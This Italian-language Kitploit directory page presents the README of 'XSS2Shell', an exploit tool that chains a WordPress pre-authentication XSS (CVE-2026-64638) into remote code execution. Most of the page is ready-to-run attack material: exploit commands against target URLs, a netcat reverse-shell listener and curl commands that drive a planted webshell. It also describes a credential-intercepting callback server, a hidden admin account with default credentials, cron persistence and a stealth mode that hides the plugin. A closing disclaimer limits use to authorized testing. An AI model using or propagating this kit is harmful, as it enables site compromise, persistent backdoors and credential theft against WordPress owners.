Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSS2Shell — Sfrutta la XSS pre-autenticazione di WordPress (CVE-2026-64638) per ottenere l'esecuzione remota di codice, installando una webshell backdoor crittografata con AES con opzioni di persistenza, upload di file, reverse shell e stealth per engagement autorizzati di red-team. | Kitploit
Strumenti/GitHubGitHub/g0d150ne/xss2shell
Meccanismi di PersistenzaExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubg0d150ne/xss2shell

XSS2Shell

Sfrutta la XSS pre-autenticazione di WordPress (CVE-2026-64638) per ottenere l'esecuzione remota di codice, installando una webshell backdoor crittografata con AES con opzioni di persistenza, upload di file, reverse shell e stealth per engagement autorizzati di red-team.

629 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

XSS2Shell ULTIMATE v3.0

Catena di exploit WordPress Pre-Auth XSS → RCE
Sviluppato da G0D150NE

📌 Funzionalità

  • 🔍 Rilevamento automatico di XSS e versione di WordPress
  • 🎯 3 Modalità: Auto, XSS, Diretta
  • 📡 Server di callback per intercettare le credenziali
  • 🐚 WebShell con molteplici metodi di esecuzione
  • 🔄 Persistenza (cron job, admin nascosto, auto-replica)
  • 📁 Upload/download di file
  • 🖥️ Reverse shell con un clic
  • 🛡️ Modalità stealth (si nasconde dalla lista dei plugin)
  • 🔐 Backdoor crittografata AES-256

📦 Installazione

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 Avvio rapido

1. Configura il listener

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. Esegui l'exploit

Modalità Auto (consigliata)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

Modalità XSS (senza credenziali)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Modalità Diretta (con credenziali)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Esecuzione dei comandi

Dopo l'installazione della webshell:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Esempi di utilizzo

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Opzioni della riga di comando

OpzioneDescrizionePredefinito
targetURL WordPress di destinazioneObbligatorio
-u, --usernameNome utente admin di WordPress-
-p, --wp-passPassword admin di WordPress-
--lhostIndirizzo IP del listener127.0.0.1
--lportPorta del listener4444
--modeModalità di exploit (auto/xss/direct)auto
--slugNome slug del pluging0d150ne
--callback-portPorta del server di callback9090
--backdoor-passPassword della backdoorG0D150NE

🐚 Funzionalità WebShell

Dopo un exploit riuscito:

FunzionalitàComando
Esegui comando?b2h=BASE64_CMD
Carica file-F '[email protected]'
Reverse shell?rev=1
Comando in chiaro?cmd=id
Backdoor crittografata?decrypt=AES_DATA

Admin nascosto creato:

  • Nome utente: sysadmin_{slug}
  • Password: {backdoor-pass} (predefinita: G0D150NE)

📸 Output di esempio

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Risoluzione dei problemi

ProblemaSoluzione
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refusedControlla il listener: nc -lvnp 4444
Login fallitoVerifica le credenziali o usa la modalità XSS
Upload del plugin non riuscitoControlla i permessi, usa uno slug diverso
Conflitto di argomentiUsa -p per wp-pass, --backdoor-pass per la backdoor

⚠️ Disclaimer

Solo per scopi didattici e test autorizzati.
Usa solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.
L'autore non è responsabile per eventuali usi impropri o danni.

📞 Contatti

  • Autore: G0D150NE
  • CVE: CVE-2026-64638
Scarica lo strumento